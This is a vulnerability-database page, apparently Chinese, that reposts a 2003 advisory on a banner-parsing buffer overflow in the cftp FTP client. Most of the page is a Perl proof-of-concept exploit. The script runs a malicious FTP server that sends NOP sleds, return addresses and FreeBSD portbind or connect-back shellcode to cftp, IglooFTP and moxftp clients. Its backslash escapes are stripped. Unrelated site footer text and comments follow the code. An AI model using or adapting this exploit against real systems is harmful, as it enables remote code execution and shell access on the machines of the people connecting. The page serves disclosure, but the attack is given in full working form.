cftp 0.12 – Banner Parsing Buffer Overflow
漏洞ID | 1054023 | 漏洞类型 | |
发布时间 | 2003-07-10 | 更新时间 | 2003-07-10 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | FreeBSD | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8160/info
A buffer overflow vulnerability has been reported in cftp. The vulnerability occurs when cftp is parsing 'Welcome' banner messages from remote FTP servers. When cftp receives an FTP banner exceeding a certain length, it will trigger the overflow condition. This could allow for execution of malicious code in the context of the FTP client.
#!/usr/bin/perl
# PoC exploit for iglooftp, cftp and moxftp for freebsd
# moxftp / mftp 2.2
# cftp 0.12
# Iglooftp 0.6.1
# Some of the code is fucked, the passive connection is a cheap hack and will not
# respawn, so the fake ftpd will have to be restarted... (only IglooFTP)
# Some RET adr's change, this can be fixed with gdb, look into it yourself..
# all the clients are from ports.. some may have been fixed, did this shit some
# time ago..
# thanks to kokanin for help and advice
# code by inv[at]dtors
use IO::Socket;
sub convert_ret {
my($ret) = @_;
for ($x=8; $x>0; $x=$x-2){
$ret = substr($ret_temp,$x,2);
$new_ret .= chr hex "$ret";
}
return $new_ret;
}
sub convert_ip {
my($ip) = @_;
@ip_tmp = split(/./, $ip);
for($x=0; $x<4; $x++) {
$new_ip .= chr @ip_tmp[$x];
}
return $new_ip;
}
$server_port = 21;
$passive_server_port = 10324;
unless(@ARGV == 3 || @ARGV == 2)
{ die
"Usage ./DSR-ftp_clients.pl Shellcode Client Ipn
tShellcode:t0 = Portbind
ttt1 = Connect backn
tClient:tt0 = IglooFTP (FreeBSD 4.7)
ttt1 = cftp (FreeBSD 4.7)
ttt2 = Moxftp (FreeBSD 4.7)
ttt3 = cftp (FreeBSD 5.0)
ttt4 = IglooFTP (FreeBSD 5.0)
ttt5 = Moxftp (FreeBSD 5.0)n"
}
($shellcode_arg, $client_arg, $extra_arg) = @ARGV;
$user_ip = convert_ip($extra_arg);
@shellcode_list = (
"Portbind,x31xc9xf7xe1x51x41x51x41x51x51xb0x61xcdx80x89xc3x52x66x68x27x10x66x51x89xe6xb1x10x51x56x50x50xb0x68xcdx80x51x53x53xb0x6axcdx80x52x52x53x53xb0x1excdx80xb1x03x89xc3xb0x5ax49x51x53x53xcdx80x41xe2xf5x51x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x51x54x53x53xb0x3bxcdx80",
"Connect Back,x31xc9xf7xe1x51x41x51x41x51x51xb0x61xcdx80x89xc3x68"."$user_ip"."x66x68x27x10x66x51x89xe6xb2x10x52x56x50x50xb0x62xcdx80x41xb0x5ax49x51x53x53xcdx80x41xe2xf5x51x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x51x54x53x53xb0x3bxcdx80");
@client_list = (
"IglooFTP - FreeBSD 4.7,188,0xbfbfc560,0",
"cftp - FreeBSD 4.7,8192,0xbfbffb04,1,300",
"mftp - FreeBSD 4.7,516,0xbfbff8e0,1,100",
"cftp - FreeBSD 5.0,8196,0xbfbffa30,1,300",
"IglooFTP - FreeBSD 5.0,212,0xbfbfc440,0",
"mftp - FreeBSD 5.0,532,0xbfbff950,1,100");
@client_info = split(/,/,@client_list[$client_arg]);
@shellcode_info = split(/,/,@shellcode_list[$shellcode_arg]);
print "tDSR-ftp_clients by invn
Setting up Service on Port: $server_port
Client: @client_info[0]
Using Shellcode: @shellcode_info[0]
Using Offset: @client_info[2]n";
$shellcode = @shellcode_info[1];
$shellcode_length = length($shellcode);
$nop_count = @client_info[1] - $shellcode_length - 8;
$nops = "x90"x$nop_count;
$ret_temp = @client_info[2];
$ret = substr($ret_temp,2,8);
$ret = convert_ret($ret);
$ret = "$ret"x2;
if(@client_info[3] eq "1") {
$nops_x = "x90"x@client_info[1];
$nops_y = "x90"x@client_info[4];
$exploit_string = "$nops_x"."$ret"."$nops_y"."$shellcode";
}
if($client_arg == 0 or $client_arg == 4) {
$exploit_string ="total 666
drwxr-xr-x 25 root wheel 1536 Jan 28 00:13 .
drwxr-xr-x 14 root wheel 512 Jan 28 00:13 ..
-rwxr-xr-x 2 inv inv 512 Jan 29 01:00 $nops$shellcode$ret";
}
$server = IO::Socket::INET->new(LocalPort => $server_port,
Type => SOCK_STREAM,
Reuse => 1,
Listen => 10)
or die "Can't listen on $server_port : $!n";
while ($client = $server->accept()) {
if(@client_info[3] == 1) {
print $client "220 $exploit_stringn";
}
if(@client_info[3] eq "0") {
print $client "220 0xdeadcoden";
while($request !=~ /QUIT/i) {
$request = <$client>;
print $request;
if($request =~ /PASS/i) {
print $client "230 User anonymous logged in.n";
}
if($request =~ /USER/i) {
print $client "331 Password required for anonymous.n";
}
if($request =~ /SYST/i) {
print $client "215 UNIX Type: L8n";
}
if($request =~ /REST/i) {
print $client "350 Restarting.n";
}
if($request =~ /TYPE/i) {
print $client "200 Type set to A.n";
}
if($request =~ /PWD/i or $request =~ /FEAT/i) {
print $client "257 "/usr/home/inv/" is current directory.n";
}
if($request =~ /PASV/i) {
$passive_server = IO::Socket::INET->new(LocalPort => $passive_server_port,
Type => SOCK_STREAM,
Reuse => 1,
Listen => 10)
or die "Can't open passive port";
print $client "227 Entering Passive Mode (127,0,0,1,40,84)n";
}
if ($request =~ /LIST/i) {
while($passive_client = $passive_server->accept()){
print $client "150 Starting transfer.n";
print $passive_client $exploit_string;
close $passive_client;
print $client "226 BANG YOU ARE DEAD!!!n";
}
}
}
close $client;
}
}
相关推荐: ZPop3D Bad Login Logging Failure Vulnerability
ZPop3D Bad Login Logging Failure Vulnerability 漏洞ID 1102540 漏洞类型 Design Error 发布时间 2002-01-30 更新时间 2002-01-30 CVE编号 N/A CNNVD-ID N…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666